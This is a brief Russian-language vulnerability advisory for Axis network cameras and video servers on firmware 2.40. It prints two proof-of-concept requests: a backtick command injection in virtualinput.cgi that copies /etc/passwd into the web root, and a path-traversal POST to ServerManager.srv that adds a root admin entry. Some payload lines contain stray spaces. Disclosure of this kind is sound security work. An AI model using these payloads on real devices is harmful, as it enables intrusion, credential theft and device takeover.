Программа: Axis Network Cameras Firmware Version 2.40; Axis 2100/2110/2120/2420/2130 Network Camera, 2400/2401 Video Server
Несколько уязвимостей обнаружено в Axis network cameras. Удаленный пользователь может просматривать и редактировать файлы и получить административный доступ к целевой системе.
1.
/axis-cgi/io/virtualinput.cgi?\x60cat </etc/passwd>/mnt/flash/etc/ httpd/html/
passwd\x60 HTTP/1.1
2.
POST /cgi-bin/scripts/../../this_server/ ServerManager.srv HTTP/1.0
\nContent-Length: 250 Pragma: no-cache
conf_Security_List=root%%3AADVO%%30 t&checkAdmin=on&check Dial=on&checkView=on&servermanager_
return_page=%%2Fadmin%%2Fsec_ users.shtml&servermanager_do=set_variables
